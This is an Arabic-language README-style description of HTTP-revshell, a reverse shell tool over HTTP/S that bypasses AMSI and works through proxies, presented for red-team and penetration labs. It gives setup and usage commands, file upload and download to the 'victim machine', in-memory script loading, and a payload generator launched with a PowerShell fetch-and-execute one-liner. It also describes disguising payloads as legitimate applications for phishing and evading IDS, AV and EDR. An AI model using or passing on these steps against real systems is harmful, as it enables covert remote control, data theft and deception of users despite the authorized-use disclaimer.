
شل عكسي باستخدام بروتوكول HTTP/S مع تجاوز AMSI ومدرك للوكيل
HTTP-revshell هي أداة تركز على تمارين الفريق الأحمر ومختبرات الاختراق. توفر هذه الأداة اتصالاً عكسياً عبر بروتوكول HTTP/S. تستخدم قناة خفية للسيطرة على الجهاز الضحية من خلال طلبات الويب وبالتالي تفادي حلول مثل IDS و IPS و AV.
ملاحظة: لن يتم صيانة الأداة من حيث التهرب. مع بعض التغييرات البسيطة يمكنك تجاوز العديد من EDRs الموجودة في السوق.

استخدام الخادم:
usage: server.py [-h] [--ssl] [--autocomplete] host port
positional arguments:
host Listen Host
port Listen Port
optional arguments:
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions
استخدام العميل:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt
تتيح لك هذه الوظيفة رفع أي ملف إلى الجهاز الضحية.
الاستخدام:
upload /src/path/file C:\dest\path\file
تتيح لك هذه الوظيفة تنزيل ملف إلى جهاز المهاجم.
الاستخدام:
download C:\src\path\file /dst/path/file
تتيح لك هذه الوظيفة تحميل سكربتات باورشيل دون الحاجة إلى الكتابة على قرص الضحية، وذلك بقراءة الملف عبر حركة مرور HTTP شرعية.
الاستخدام:
loadps1 /path/to/the/local/server/PowershellScript.ps1
يتيح لك هذا السكربت إنشاء ملف تنفيذي يحتوي على الحمولة اللازمة لاستخدام HTTP-revshell، كل ما عليك هو اتباع التعليمات على الشاشة لإنشائه. هناك 6 قوالب محددة مسبقاً وقالب قابل للتخصيص، مع البيانات التي تريدها.
الحمولات التي يولدها السكربت تتضمن أيقونة التطبيق الأصلي، بالإضافة إلى معلومات المنتج وحقوق النشر الخاصة بالتطبيق الأصلي. علاوة على ذلك، كل منها يفتح التطبيق الأصلي قبل إنشاء الاتصال مع الخادم، متظاهراً بأنه تطبيق شرعي. يمكن استخدام هذا في التصيد أو تمارين الفريق الأحمر.
استخدام مولد التحميل:
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

هام: جميع الحقول في القوالب المحددة مسبقًا يتم إكمالها تلقائيًا بالضغط على مفتاح Enter.
هذا السكربت مرخص بموجب LGPLv3+. رابط مباشر للترخيص الترخيص.
يجب استخدام HTTP-revshell فقط لاختبار الاختراق المصرح به و/أو للأغراض التعليمية غير الربحية. لن يكون أي استخدام خاطئ لهذا البرنامج من مسؤولية المؤلف أو أي متعاون آخر. استخدمه على خوادمك الخاصة و/أو بإذن من مالك الخادم.